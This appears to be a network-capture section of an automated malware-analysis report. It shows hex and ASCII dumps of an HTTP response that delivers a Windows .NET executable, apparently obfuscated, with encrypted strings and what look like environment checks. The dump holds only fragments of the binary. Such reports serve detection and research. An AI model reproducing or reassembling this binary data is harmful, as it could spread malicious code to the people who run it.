2023-11-18 09:03:00 UTC	10515	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 35 25 32 46 78 74 63 6d 36 7a 39 48 66 5a 69 25 32 42 76 6b 73 66 42 73 43 56 6f 31 36 4b 66 6a 6a 4c 5a 4b 68 31 4a 39 61 5a 67 5a 71 71 33 4a 4f 39 71 25 32 46 61 79 35 65 58 31 47 30 79 47 70 42 68 4a 48 45 71 66 65 25 32 42 45 77 4d 49 68 46 49 25 32 46 61 61 6e 4a 74 32 75 69 62 79 58 32 37 5a 5a 6d 58 73 39 37 47 44 35 6a 30 57 6d 42 33 50 75 44 55 47 35 53 76 6a 6c 36 59 73 6c 5a 48 6a 7a 71 54 35 4b 30 64 5a 69 68 4f 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5%2Fxtcm6z9HfZi%2BvksfBsCVo16KfjjLZKh1J9aZgZqq3JO9q%2Fay5eX1G0yGpBhJHEqfe%2BEwMIhFI%2FaanJt2uibyX27ZZmXs97GD5j0WmB3PuDUG5Svjl6YslZHjzqT5K0dZihOg%3D%3D"}],"group":"cf-nel","max_a
2023-11-18 09:03:00 UTC	10515	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e 59 39 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 cf 30 02 00 38 03 00 00 00 00 00 00 c9 50 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY9e"008P `@ @
2023-11-18 09:03:00 UTC	10516	IN	Data Raw: d0 db 06 00 00 00 65 02 74 29 0b 0a 08 11 00 0b 07 00 00 00 d1 15 09 79 a6 b4 b8 a7 a1 b2 a5 09 00 00 00 b3 37 08 4d d8 c1 d2 db c0 d6 c1 da c4 07 00 00 00 e2 9c 5d 3e 8c 8d 8f 87 8e 8b 84 06 00 00 00 70 fe 4d 1f 1e 1f 1d 17 15 02 04 00 00 00 3b 7f ba 58 55 52 5a 58 07 00 00 00 a5 a9 2b 7e c9 c9 e1 c0 cc c7 f6 04 00 00 00 62 36 a1 5f 0c 2b 1a 31 03 00 00 00 28 fd 45 11 1a 4e 7b 05 00 00 00 89 66 e2 66 e2 e1 f1 e7 fa 08 00 00 00 65 f7 c1 3c 57 56 11 17 13 01 08 06 22 00 00 00 18 4e 12 0e 75 7d 6c 6b 61 4b 6a 7d 6c 6d 68 75 77 5b 47 2a 2b 76 71 4f 38 75 77 6a 7e 38 32 38 6c 7b 7d 74 7d 4b 0c 00 00 00 97 35 82 44 e5 f2 e5 e2 e3 f4 f6 f1 e2 f9 f6 da 15 00 00 00 dd 7c 47 38 b3 b2 b4 a9 bc af b2 ad af b2 be fd a9 bb b2 ae b2 af be b4 b0 05 00 00 00 20 91 6d 5f Data Ascii: et)y7M]>pM;XURZX+~b6_+1(EN{ffe<WV"Nu}lkaKj}lmhuw[G*+vqO8uwj~828l{}t}K5D\|G8 m_
2023-11-18 09:03:00 UTC	10518	IN	Data Raw: 3a ff 47 7e 58 5e 56 5f 4c 5f 56 66 5f 5d 5b 48 55 4e 69 1a 56 5b 59 55 76 66 5b 5e 48 5b 4f 7d 0e 00 00 00 2e 8e 3f 7b 01 5d 5a 4b 42 42 4f 59 41 5a 5e 57 5c 6d 01 00 00 00 46 4b 36 24 69 01 00 00 00 32 16 e1 76 6e 08 00 00 00 5d 62 91 75 2e 38 31 34 3b 32 2f 0d 07 00 00 00 4e 86 e0 06 2c 2a 60 7d 37 2b 25 07 00 00 00 0c c7 bd 00 6e 68 22 3f 75 69 67 07 00 00 00 a8 f3 6d 25 ca cc 86 9c d1 cd c3 07 00 00 00 0c cc 98 72 6e 68 22 38 75 69 67 0e 00 00 00 0c e4 3c 46 69 78 65 60 7d 7f 22 7f 69 65 67 63 63 6f 0b 00 00 00 ae 0c 7f 75 dd cb c7 c5 c1 c1 cd f1 d4 c1 c3 12 00 00 00 6c 63 68 7a 09 18 05 00 1d 1f 42 15 1e 03 18 1f 05 04 01 1e 03 0a 0f 00 00 00 ab 22 df 6f d2 d9 c4 df d8 c2 c3 c6 d9 c4 cd f4 d1 c4 c6 19 00 00 00 6e fa c2 33 31 1d 0b 07 05 01 01 2d 41 Data Ascii: :G~X^V_L_Vf_][HUNiV[YUvf[^H[O}.?{]ZKBBOYAZ^W\mFK6$i2vn]bu.814;2/N,*`}7+%nh"?uigm%rnh"8uig<Fixe`}"iegccoulchzB"on31-A
2023-11-18 09:03:00 UTC	10519	IN	Data Raw: 50 5c 5b 5a 5d 56 57 51 58 5b 45 51 59 51 5f 59 50 5a 0b 00 00 00 d7 a0 08 3d a4 a4 b6 87 a5 b2 a4 a0 b8 a5 95 20 00 00 00 de c5 7b 06 b6 bd b8 bf ba ba ba b7 b6 bb b9 b8 b7 b8 bd b1 b2 b1 b0 b7 b6 b0 bb b5 b9 b3 b1 ba ae bb bf b0 04 00 00 00 82 9c 20 52 cb c9 db cf 20 00 00 00 f0 5d 48 48 94 95 94 99 9d 9d 99 93 97 94 98 95 98 80 80 9e 9d 97 9b 9e 9c 93 9b 80 94 9f 97 80 9b 99 9d 92 08 00 00 00 f0 26 02 7d 89 84 99 9b 99 9c 80 a3 20 00 00 00 25 a7 9d 33 47 49 4e 49 44 44 43 4b 44 42 48 49 41 48 4e 48 4f 48 41 49 4a 46 44 55 40 49 46 43 4f 43 4d 4f 09 00 00 00 26 25 86 30 5f 43 6d 48 49 4b 4b 49 65 20 00 00 00 c5 34 8d 5b a1 a0 a1 ab a8 ad a4 a9 a2 a4 af af a3 ae aa ac a8 b5 ab a7 a3 a7 aa a6 b5 af a3 a0 a3 a2 ad a6 0a 00 00 00 61 b6 f2 46 15 0d 14 00 37 Data Ascii: P\[Z]VWQX[EQYQ_YPZ= { R ]HH&} %3GINIDDCKDBHIAHNHOHAIJFDU@IFCOCMO&%0_CmHIKKIe 4[aF7
2023-11-18 09:03:00 UTC	10520	IN	Data Raw: 71 7e 76 70 72 7f 73 7e 6b 7c 77 6b 72 76 71 7a 6b 79 79 77 72 0c 00 00 00 2c a7 9b 77 58 49 40 40 4d 7b 0c 58 5f 59 5e 78 20 00 00 00 6d 68 71 09 0a 08 00 0c 0f 0c 0c 0c 0a 01 0f 1d 06 0e 01 01 02 06 0f 07 00 09 0c 08 03 00 0e 0e 01 03 06 1d 0a 00 00 00 15 ee ba 74 61 70 79 79 74 42 74 61 70 58 20 00 00 00 11 3c 89 5c 76 75 7a 70 76 7b 7a 7c 7f 7a 75 76 7f 61 7b 70 75 70 72 7e 78 77 74 77 72 7e 7e 7a 7f 7a 77 61 0d 00 00 00 81 f3 3c 37 f5 e4 ed ed e0 d6 a1 e0 e5 f3 e0 f4 c6 20 00 00 00 f7 e5 0e 3d 9a 99 9b 92 9c 91 91 91 90 91 96 99 9c 9b 90 95 9d 87 87 93 90 9c 87 91 9d 94 9f 91 9b 90 94 91 06 00 00 00 6f c6 d9 41 1c 1a 0b 00 17 2a 20 00 00 00 0b b8 0f 11 65 64 65 66 65 7b 6f 60 69 60 60 6a 62 63 61 60 6d 66 69 6c 6c 66 66 65 63 6a 65 7b 7b 60 6f 62 0c Data Ascii: q~vprs~k\|wkrvqzkyywr,wXI@@M{X_Y^x mhqtapyytBtapX <\vuzpv{z\|zuva{pupr~xwtwr~~zzwa<7 =oA* edefe{o`i``jbca`mfillffecje{{`ob
2023-11-18 09:03:00 UTC	10522	IN	Data Raw: 99 98 91 95 9b 97 92 90 9e 96 96 98 9f 95 9e 95 94 91 8c 97 9a 90 94 98 93 9f 94 97 17 00 00 00 e7 25 e1 03 95 88 93 86 84 8e 93 89 82 8f 93 92 a6 c7 93 81 88 94 88 95 84 8e aa 20 00 00 00 5c 0e 59 1b 32 31 33 31 2c 3d 3a 36 35 37 2c 30 3a 37 32 33 34 3a 36 2c 38 32 3b 3e 35 2c 3e 32 38 3e 3a 3e 05 00 00 00 87 30 95 7c fe ef f3 f2 c6 20 00 00 00 ec de 65 43 80 8d 8f 9c 89 80 81 86 8b 8e 83 88 80 88 8b 84 89 83 89 8a 8d 8f 81 88 82 86 8e 88 8a 8a 86 8b 0a 00 00 00 06 05 77 1e 63 6a 6f 64 69 4b 26 69 73 42 20 00 00 00 f8 87 a4 54 92 97 90 95 9f 9f 9a 88 9b 91 95 95 88 9d 9c 95 9f 9a 9c 9e 9d 91 99 93 94 92 9b 91 94 9c 91 9d 08 00 00 00 c9 9c fe 5b a1 bd bc 88 e9 99 9d 86 20 00 00 00 74 15 8e 43 1c 17 18 1b 1e 11 1e 10 1a 18 17 1b 1d 04 19 1b 18 13 13 16 15 Data Ascii: % \Y2131,=:657,0:7234:6,82;>5,>28>:>0\| eCwcjodiK&isB T[ tC
2023-11-18 09:03:00 UTC	10523	IN	Data Raw: 69 3a 32 6f 26 69 32 3e 6f 21 69 32 28 7c 7d 7b 66 73 71 7d 7e 32 7f 7b 66 71 7b 44 18 3b 6f 20 69 32 28 42 5b 48 3a 32 6f 23 69 32 28 61 61 77 60 76 76 73 32 42 5b 18 6f 61 61 28 7f 7f 28 5a 5a 32 6b 6b 6b 6b 3d 5f 5f 3d 76 76 28 22 69 32 28 77 7f 7b 66 32 7a 71 7c 67 73 7e 32 76 7e 7b 67 50 18 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 6e 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 32 66 7d 70 77 7c 73 7b 7c 75 73 52 32 28 7f 73 60 75 77 7e 77 46 32 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 6e 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 32 60 77 7e 73 77 66 41 32 77 7c 73 7b 7c 75 53 32 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f Data Ascii: i:2o&i2>o!i2(\|}{fsq}~2{fq{D;o i2(B[H:2o#i2(aaw`vvs2B[oaa((ZZ2kkkk=__=vv("i2(w{f2zq\|gs~2v~{gPn????????????????????????????????????????????????????nn??????????????2f}pw\|s{\|usR2(s`uw~wF2???????????????nn?????????????????2`w~swfA2w\|s{\|uS2??????????
2023-11-18 09:03:00 UTC	10524	IN	Data Raw: 00 27 61 34 20 42 4a 46 69 07 00 00 00 2c 3e 1e 26 42 5b 43 42 47 42 79 07 00 00 00 c9 1b a1 53 a7 be a6 a7 a2 a7 9c 22 00 00 00 58 c9 ee 31 35 3d 2c 2b 21 0b 2a 3d 2c 2d 28 35 37 1b 07 6a 6b 36 31 0f 78 15 17 0a 1e 78 72 78 0c 1b 1d 14 1d 0b 13 00 00 00 92 7d 40 25 eb e0 fd ff f7 df fe f3 f1 fb e1 eb fa c2 fe f3 e6 fd c6 01 00 00 00 32 91 4c 6a 02 0f 00 00 00 26 93 57 52 54 49 55 55 43 45 49 54 76 79 14 15 48 4f 71 0b 00 00 00 5e a0 57 06 3a 17 2c 31 2d 2d 3b 3d 31 2c 0e 0f 00 00 00 78 c7 1b 08 1d 0e 11 0a 3c 13 0b 11 3c 27 4a 4b 16 11 2f 0c 00 00 00 7b 11 b6 38 09 1e 19 16 0e 35 17 1a 12 09 1e 28 0e 00 00 00 3c 4f 29 09 1c 71 73 6e 7a 1c 16 1c 68 7f 79 70 79 6f 02 00 00 00 5c bf 7e 19 6e 04 07 00 00 00 f9 ac df 5d 97 8e 96 97 92 97 ac 0a 00 00 00 ce 13 Data Ascii: 'a4 BJFi,>&B[CBGByS"X15=,+!*=,-(57jk61xxrx}@%2Lj&WRTIUUCEITvyHOq^W:,1--;=1,x<<'JK/{85(<O)qsnzhypyo\~n]
2023-11-18 09:03:00 UTC	10526	IN	Data Raw: 29 28 3a 22 21 21 2c 6d 39 22 23 6d 3e 24 6d 2a 23 24 39 24 3f 1a 02 00 00 00 75 65 60 24 44 03 0a 00 00 00 07 1a 9b 71 6b 6b 63 29 73 77 7e 75 64 65 0d 00 00 00 ae 28 3d 28 da de d7 dc cd cb ea da de d7 dc ed ec 0a 00 00 00 87 42 96 70 eb eb e3 a9 f3 f7 fe f5 e4 e5 10 00 00 00 af 0f c4 0d d6 ca e4 d6 c0 dd db dc ca eb db df d6 dd ec ed 0a 00 00 00 f3 13 7f 3f 9f 9f 97 dd 87 83 8a 81 90 91 1c 00 00 00 4a e9 dd 55 38 2f 2e 23 3c 25 38 1a 27 22 3e 23 38 25 2d 26 0b 2f 39 25 26 09 3e 3a 33 38 09 08 03 00 00 00 1e 82 5a 5f 4d 5b 5f 1c 00 00 00 22 ff 81 06 50 47 46 4b 54 4d 50 72 02 47 54 4b 56 4b 4f 4b 50 72 02 56 44 4d 51 4d 50 41 4b 6f 0f 00 00 00 2c 8d 5c 0a 61 6f 6b 49 48 43 61 4b 42 45 42 45 4d 44 6f 0a 00 00 00 cb 1e c0 79 a7 a7 af e5 bf bb b2 b9 a8 a9 Data Ascii: )(:"!!,m9"#m>$m*#$9$?ue`$Dqkkc)sw~ude(=(Bp?JU8/.#<%8'">#8%-&/9%&>:38Z_M[_"PGFKTMPrGTKVKOKPrVDMQMPAKo,\aokIHCaKBEBEMDoy
2023-11-18 09:03:00 UTC	10527	IN	Data Raw: 31 d3 a4 db a7 a2 c3 a8 9a a1 9e ae c0 8e cd 8e a8 9d 0c 00 00 00 4c 58 29 0e 76 1d 2f 14 2b 1b 75 3b 78 3b 1d 28 06 2a 1e 02 7b 0d 00 00 0a 2a 1e 02 7b 0e 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 0d 00 00 0a 02 04 7d 0e 00 00 0a 2a d2 20 36 13 6a f8 20 29 55 55 a5 5a 28 11 00 00 0a 02 7b 0d 00 00 0a 6f 15 00 00 0a 58 20 29 55 55 a5 5a 28 13 00 00 0a 02 7b 0e 00 00 0a 6f 16 00 00 0a 58 2a 1e 02 7b 18 00 00 0a 2a 1e 02 7b 19 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 18 00 00 0a 02 04 7d 19 00 00 0a 2a d2 20 8c 56 30 3b 20 29 55 55 a5 5a 28 11 00 00 0a 02 7b 18 00 00 0a 6f 15 00 00 0a 58 20 29 55 55 a5 5a 28 13 00 00 0a 02 7b 19 00 00 0a 6f 16 00 00 0a 58 2a 1e 02 7b 1a 00 00 0a 2a 1e 02 7b 1b 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 1a 00 00 0a 02 04 7d Data Ascii: 1LX)v/+u;x;({{V(}} 6j )UUZ({oX )UUZ({oX{{V(}} V0; )UUZ({oX )UUZ({oX{{*V(}}
2023-11-18 09:03:00 UTC	10528	IN	Data Raw: 03 7d 56 00 00 04 2a 1e 02 7b 57 00 00 04 2a 22 02 03 7d 57 00 00 04 2a 1e 02 7b 58 00 00 04 2a 1e 02 7b 59 00 00 04 2a 22 02 03 7d 59 00 00 04 2a 4a 02 28 0f 00 00 0a 02 73 43 01 00 0a 7d 58 00 00 04 2a 1e 02 7b 5a 00 00 04 2a 1e 02 28 5a 01 00 0a 2a 2e 73 e1 00 00 06 80 63 00 00 04 2a 1e 02 28 0f 00 00 0a 2a 1e 02 28 0f 00 00 0a 2a 4a 03 02 7b 65 00 00 04 6f 61 01 00 0a 6f 03 00 00 0a 2a 1e 02 28 0f 00 00 0a 2a 5e 02 7b 66 00 00 04 03 6f 62 01 00 0a 6f 35 00 00 0a 28 34 00 00 2b 2a 2e 73 e8 00 00 06 80 67 00 00 04 2a 1e 02 28 0f 00 00 0a 2a 1e 03 6f 2e 00 00 06 2a 1e 03 28 35 00 00 2b 2a 4a 03 fe 06 30 00 00 06 73 64 01 00 0a 73 65 01 00 0a 2a 1e 03 6f 66 01 00 0a 2a 1e 03 6f 67 01 00 0a 2a 5e 03 7e 18 00 00 04 03 6f 79 00 00 0a 6f 68 01 00 0a 6f d8 00 Data Ascii: }V{W"}W{X{Y"}YJ(sC}X{Z(Z.sc((J{eoao(^{fobo5(4+.sg(o.(5+J0sdseofog^~oyoho
2023-11-18 09:03:00 UTC	10530	IN	Data Raw: 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 05 00 00 0a a2 25 17 02 7b 0e 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 05 00 00 0a a2 28 17 00 00 0a 2a 00 13 30 03 00 41 00 00 00 03 00 00 11 03 75 08 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 11 00 00 0a 02 7b 18 00 00 0a 06 7b 18 00 00 0a 6f 12 00 00 0a 2c 17 28 13 00 00 0a 02 7b 19 00 00 0a 06 7b 19 00 00 0a 6f 14 00 00 0a 2a 16 2a 17 2a 00 00 00 13 30 07 00 67 00 00 00 02 00 00 11 14 20 2f 97 69 29 28 df 00 00 06 18 8d 1c 00 00 01 25 16 02 7b 18 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 05 00 00 0a a2 25 17 02 7b 19 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 Data Ascii: q-&+o%{%q-&+o(0Au.4,/({{o,({{o**0g /i)(%{%q-&+o%{%q-&+
2023-11-18 09:03:00 UTC	10531	IN	Data Raw: 28 03 00 00 2b 2a 1b 30 02 00 a5 01 00 00 0a 00 00 11 20 1c 95 69 29 28 df 00 00 06 73 30 00 00 0a 0a 06 6f 31 00 00 0a 0b 07 6f 32 00 00 0a 0c 38 b6 00 00 00 08 6f 33 00 00 0a 0d 09 20 42 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 35 00 00 0a 20 5e 95 69 29 28 df 00 00 06 28 36 00 00 0a 2c 2b 09 20 71 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 37 00 00 0a 20 84 95 69 29 28 df 00 00 06 6f 28 00 00 0a 2d 51 09 20 95 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 35 00 00 0a 20 a1 95 69 29 28 df 00 00 06 6f 28 00 00 0a 2d 26 09 20 b3 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 20 c6 95 69 29 28 df 00 00 06 28 36 00 00 0a 2c 08 17 13 04 dd c9 00 00 00 08 6f 38 00 00 0a 3a 3f ff ff ff de 0a 08 2c 06 08 6f 06 00 Data Ascii: (+*0 i)(s0o1o28o3 Bi)(o4oo5 ^i)((6,+ qi)(o4oo7 i)(o(-Q i)(o4oo5 i)(o(-& i)(o4o i)((6,o8:?,o
2023-11-18 09:03:00 UTC	10533	IN	Data Raw: 04 20 e7 93 69 29 28 df 00 00 06 7e 08 00 00 04 28 3b 00 00 0a 28 20 00 00 06 28 68 00 00 06 7e 0f 00 00 04 20 f4 93 69 29 28 df 00 00 06 28 36 00 00 0a 2c 1a 28 18 00 00 06 2c 06 16 28 1c 00 00 0a 28 1b 00 00 06 2c 06 16 28 1c 00 00 0a 7e 10 00 00 04 20 fb 93 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 1a 00 00 06 2c 06 16 28 1c 00 00 0a 7e 11 00 00 04 20 02 92 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 1d 00 00 06 2c 06 16 28 1c 00 00 0a 7e 12 00 00 04 20 09 92 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 19 00 00 06 2c 06 16 28 1c 00 00 0a 7e 08 00 00 04 20 10 92 69 29 28 df 00 00 06 28 3c 00 00 0a 2c 0d 28 17 00 00 06 2c 06 16 28 1c 00 00 0a de 03 26 de 00 73 48 00 00 0a 0a 73 ef 00 00 06 0b 07 06 14 16 28 92 00 00 06 7d 6e 00 00 04 28 04 00 00 2b Data Ascii: i)(~(;( (h~ i)((6,(,((,(~ i)((6,(,(~ i)((6,(,(~ i)((6,(,(~ i)((<,(,(&sHs(}n(+
2023-11-18 09:03:00 UTC	10534	IN	Data Raw: 11 04 11 05 9a 7d 74 00 00 04 11 06 fe 06 fd 00 00 06 73 62 00 00 0a 28 0d 00 00 2b 13 07 11 07 2c 56 06 73 d1 00 00 06 25 20 ff 91 69 29 28 df 00 00 06 12 02 28 6c 00 00 0a 20 09 90 69 29 28 df 00 00 06 11 06 7b 74 00 00 04 09 20 10 90 69 29 28 df 00 00 06 28 47 00 00 0a 14 6f 3f 00 00 0a 28 6d 00 00 0a 6f ce 00 00 06 25 11 07 6f d0 00 00 06 6f 63 00 00 0a 11 05 17 58 13 05 11 05 11 04 8e 69 3f 6e ff ff ff 12 01 28 6e 00 00 0a 3a 25 ff ff ff de 0e 12 01 fe 16 17 00 00 1b 6f 06 00 00 0a dc 06 2a 00 01 0c 00 00 02 00 e1 00 e2 c3 01 0e 00 00 00 00 1b 30 06 00 18 03 00 00 16 00 00 11 73 5f 00 00 0a 0a 73 46 00 00 0a 25 1f 1a 28 50 00 00 0a 6f 3e 00 00 0a 6f 60 00 00 0a 0b 38 d2 02 00 00 12 01 28 61 00 00 0a 7e 76 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 00 Data Ascii: }tsb(+,Vs% i)((l i)({t i)((Go?(mo%oocXi?n(n:%o*0s_sF%(Po>o`8(a~v%-&~u
2023-11-18 09:03:00 UTC	10535	IN	Data Raw: 06 11 0e 6f d6 00 00 06 16 6f 7a 00 00 0a 6f d6 00 00 06 18 6f 7a 00 00 0a 6f d7 00 00 06 28 bc 00 00 06 13 0f 11 08 11 0f 2d 07 7e 44 00 00 0a 2b 1b 11 0f 20 bf 9f 69 29 28 df 00 00 06 20 41 60 96 d6 28 df 00 00 06 28 7b 00 00 0a 6f 3e 00 00 0a 11 0b 17 58 13 0b 11 0b 11 0a 8e 69 3f 45 ff ff ff 11 08 6f 7c 00 00 0a 13 09 11 09 17 9a 6f 79 00 00 0a 16 3e d3 fe ff ff 07 11 07 11 09 16 9a 11 09 17 9a 04 20 c1 9f 69 29 28 df 00 00 06 05 28 6d 00 00 06 6f 3e 00 00 0a 38 ad fe ff ff 07 2a 13 30 05 00 6a 04 00 00 18 00 00 11 73 ad 00 00 06 0a 02 16 28 87 00 00 06 0b 07 2d 02 14 2a 07 20 c8 9f 69 29 28 df 00 00 06 6f 8c 00 00 06 2d 02 14 2a 16 0c 38 2e 04 00 00 28 25 00 00 0a 07 08 16 6f 88 00 00 06 74 1c 00 00 1b 6f 55 00 00 0a 20 d8 9f 69 29 28 df 00 00 06 28 Data Ascii: oozoozo(-~D+ i)( A`(({o>Xi?Eo\|oy> i)((mo>80js(- i)(o-*8.(%otoU i)((
2023-11-18 09:03:00 UTC	10537	IN	Data Raw: 00 00 06 7e 79 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 03 01 00 06 73 80 00 00 0a 25 80 79 00 00 04 28 11 00 00 2b 7e 7a 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 04 01 00 06 73 82 00 00 0a 25 80 7a 00 00 04 28 12 00 00 2b 28 13 00 00 2b 0d 09 2d 02 14 2a 09 20 8e 9e 69 29 28 df 00 00 06 14 6f 3f 00 00 0a 0d 09 18 18 6f 84 00 00 0a 20 03 02 00 00 28 85 00 00 0a 18 5a 13 04 09 1c 11 04 6f 84 00 00 0a 13 05 09 6f 79 00 00 0a 1c 11 04 58 1f 24 58 59 13 06 09 1c 11 04 58 1a 58 11 06 58 6f 86 00 00 0a 13 07 08 6f db 00 00 06 7e 7b 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 05 01 00 06 73 80 00 00 0a 25 80 7b 00 00 04 28 11 00 00 2b 7e 7c 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 06 01 00 06 73 82 00 00 0a 25 80 7c 00 00 04 28 12 00 00 2b 28 13 00 00 2b 13 08 Data Ascii: ~y%-&~us%y(+~z%-&~us%z(+(+-* i)(o?o (ZooyX$XYXXXoo~{%-&~us%{(+~\|%-&~us%\|(+(+
2023-11-18 09:03:00 UTC	10538	IN	Data Raw: 11 09 20 4c 9d 69 29 28 df 00 00 06 28 69 00 00 0a 20 5a 9d 69 29 28 df 00 00 06 11 0a fe 06 15 01 00 06 73 72 00 00 0a 28 71 00 00 06 6f 71 00 00 0a 06 11 09 11 0a 7b 8a 00 00 04 7b 86 00 00 04 11 0a 7b 89 00 00 04 28 46 00 00 06 6f 8b 00 00 0a 09 11 09 20 6c 9d 69 29 28 df 00 00 06 28 69 00 00 0a 20 7c 9d 69 29 28 df 00 00 06 11 0a fe 06 16 01 00 06 73 72 00 00 0a 28 71 00 00 06 6f 71 00 00 0a 11 0b 6f 73 00 00 0a 16 3e 83 00 00 00 06 73 d1 00 00 06 13 0f 11 0f 1b 8d 29 00 00 01 25 16 20 88 9d 69 29 28 df 00 00 06 a2 25 17 11 0a 7b 8a 00 00 04 7b 86 00 00 04 a2 25 18 20 b7 9d 69 29 28 df 00 00 06 a2 25 19 11 0a 7b 89 00 00 04 a2 25 1a 20 bd 9d 69 29 28 df 00 00 06 a2 28 74 00 00 0a 6f ce 00 00 06 11 0f 28 25 00 00 0a 20 c0 9d 69 29 28 df 00 00 06 11 0b Data Ascii: Li)((i Zi)(sr(qoq{{{(Fo li)((i \|i)(sr(qoqos>s)% i)(%{{% i)(%{% i)((to(% i)(
2023-11-18 09:03:00 UTC	10539	IN	Data Raw: df 00 00 06 20 25 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 4d 98 69 29 28 df 00 00 06 20 5f 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 87 98 69 29 28 df 00 00 06 20 89 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 b1 98 69 29 28 df 00 00 06 20 c2 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 ea 98 69 29 28 df 00 00 06 20 05 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 2d 87 69 29 28 df 00 00 06 20 30 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 58 87 69 29 28 df 00 00 06 20 6a 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 92 87 69 29 28 df 00 00 06 20 a4 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 cc 87 69 29 28 df 00 00 06 20 d1 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 f9 87 69 29 28 df 00 00 06 20 0b 86 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 Data Ascii: %i)(oe% Mi)( _i)(oe% i)( i)(oe% i)( i)(oe% i)( i)(oe% -i)( 0i)(oe% Xi)( ji)(oe% i)( i)(oe% i)( i)(oe% i)( i)(oe%
2023-11-18 09:03:00 UTC	10541	IN	Data Raw: 28 6a 00 00 0a 39 25 01 00 00 7e 1e 00 00 04 17 58 80 1e 00 00 04 09 28 6b 00 00 0a 13 04 11 04 13 05 16 13 06 38 b7 00 00 00 73 17 01 00 06 13 07 11 07 11 05 11 06 9a 7d 8b 00 00 04 11 07 fe 06 18 01 00 06 73 62 00 00 0a 28 0d 00 00 2b 13 08 11 08 39 83 00 00 00 11 07 7b 8b 00 00 04 28 8f 00 00 0a 13 09 06 73 d1 00 00 06 13 0a 11 0a 1e 8d 29 00 00 01 25 16 20 8b 8d 69 29 28 df 00 00 06 a2 25 17 12 02 28 6c 00 00 0a a2 25 18 20 af 8d 69 29 28 df 00 00 06 a2 25 19 03 a2 25 1a 20 b6 8d 69 29 28 df 00 00 06 a2 25 1b 04 a2 25 1c 20 bc 8d 69 29 28 df 00 00 06 a2 25 1d 11 09 a2 28 74 00 00 0a 6f ce 00 00 06 11 0a 11 08 6f d0 00 00 06 11 0a 6f 63 00 00 0a 11 06 17 58 13 06 11 06 11 05 8e 69 3f 3e ff ff ff 7e 16 00 00 04 20 c2 8d 69 29 28 df 00 00 06 28 36 00 00 Data Ascii: (j9%~X(k8s}sb(+9{(s)% i)(%(l% i)(%% i)(%% i)(%(tooocXi?>~ i)((6
